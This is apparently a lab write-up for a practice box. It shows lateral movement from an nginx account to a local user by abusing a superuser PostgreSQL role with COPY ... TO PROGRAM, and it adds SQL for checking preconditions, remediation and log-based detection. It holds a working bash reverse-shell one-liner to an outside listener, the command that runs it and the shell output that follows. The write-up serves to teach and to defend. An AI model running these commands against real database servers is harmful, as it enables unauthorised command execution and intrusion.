thesplodge


The PostgreSQL instance can be turned into OS command execution because the current database user is a superuser: COPY ... TO PROGRAM is restricted to superusers (and, from PostgreSQL 11, members of pg_execute_server_program), and the program it spawns runs with the OS privileges of the database server process. Here that process is not the default postgres account but the valid system user thesplodge, so any command run through COPY lands as that user.
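Before dropping a payload it is worth confirming the two preconditions in the database itself (the role really is a superuser or a pg_execute_server_program member, and which OS account the server process runs as), and the same mechanism fixes the problem from the defender's side. The following is an added example, not part of the original writeup; the application role name webapp is an assumption, while the script path and listener address are the ones used in this writeup.

```sql
-- Added example (not from the original writeup). Run as the compromised DB user
-- unless noted. Assumption: the web application's role is named "webapp".

-- 1. Who am I, and can I reach COPY ... PROGRAM? rolsuper is enough on any
--    version; on 11+ direct membership of pg_execute_server_program also works
--    (the subquery simply returns false on older servers where the role is absent).
SELECT r.rolname,
       r.rolsuper AS is_superuser,
       EXISTS (SELECT 1
               FROM pg_auth_members m
               JOIN pg_roles g ON g.oid = m.roleid
               WHERE m.member = r.oid
                 AND g.rolname = 'pg_execute_server_program') AS exec_program_member
FROM pg_roles r
WHERE r.rolname = current_user;

-- 2. Confirm the OS user and host before committing to a reverse shell:
--    COPY ... FROM PROGRAM feeds the command's stdout back as rows, so the
--    answer is readable from the SQL session with no listener at all.
--    (Text format treats backslashes specially; id/hostname output has none.)
CREATE TEMP TABLE cmd_out(line text);
COPY cmd_out FROM PROGRAM 'id; hostname';
SELECT line FROM cmd_out;
-- expected on this target: uid=...(thesplodge) ... / splodge

-- 3. Launch the staged script. The command is handed to /bin/sh -c via popen(),
--    and the session blocks until the program exits; backgrounding it under
--    nohup keeps the psql session usable while the shell runs.
COPY (SELECT '') TO PROGRAM '/dev/shm/thesplodge';
-- or, non-blocking variant:
COPY (SELECT '') TO PROGRAM 'nohup /dev/shm/thesplodge >/dev/null 2>&1 &';

-- 4. Remediation (run as a legitimate superuser): the application role never
--    needed these rights, and the server should run as a dedicated, otherwise
--    unprivileged postgres account rather than an interactive user.
ALTER ROLE webapp NOSUPERUSER;
REVOKE pg_execute_server_program FROM webapp;   -- PostgreSQL 11+ only
```

With log_statement set to 'all' (or at least 'ddl' plus auditing of COPY), every COPY ... PROGRAM call appears in the server log with the invoking role, which is the simplest detection for this technique.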

bash-4.2$ whoami
nginx
bash-4.2$ pwd
/dev/shm
bash-4.2$ echo '/bin/bash -i >& /dev/tcp/192.168.45.221/5432 0>&1' > ./thesplodge ; chmod 755 ./thesplodge

Creating a bash reverse shell script, thesplodge, in /dev/shm (world-writable and usually noexec-free). Note the file has no shebang: COPY ... TO PROGRAM hands it to /bin/sh -c, and the /dev/tcp redirection on that line is performed by the interpreting shell, so the one-liner relies on /bin/sh being bash, as it is on this target. A leading #!/bin/bash line removes that dependency.

postgres=# COPY (SELECT '') to PROGRAM '/dev/shm/thesplodge';

Executing the bash reverse shell, thesplodge, through COPY ... TO PROGRAM; the psql session blocks until the spawned shell exits.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/splodge]
└─$ nnc 5432
listening on [any] 5432 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.219.108] 49636
bash: no job control in this shell
[thesplodge@splodge .pgdata]$ whoami
whoami
thesplodge
[thesplodge@splodge .pgdata]$ hostname
hostname
splodge
[thesplodge@splodge .pgdata]$ /sbin/ifconfig
/sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.219.108  netmask 255.255.255.0  broadcast 192.168.219.255
        ether 00:50:56:9e:e3:9a  txqueuelen 1000  (Ethernet)
        RX packets 1321639  bytes 172116626 (164.1 MiB)
        RX errors 0  dropped 3037  overruns 0  frame 0
        TX packets 1011880  bytes 799515639 (762.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 17328  bytes 4475582 (4.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17328  bytes 4475582 (4.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement from the nginx user to the thesplodge user on the same host, achieved by abusing the misconfigured PostgreSQL instance: a superuser database role combined with a server process running as a real interactive account.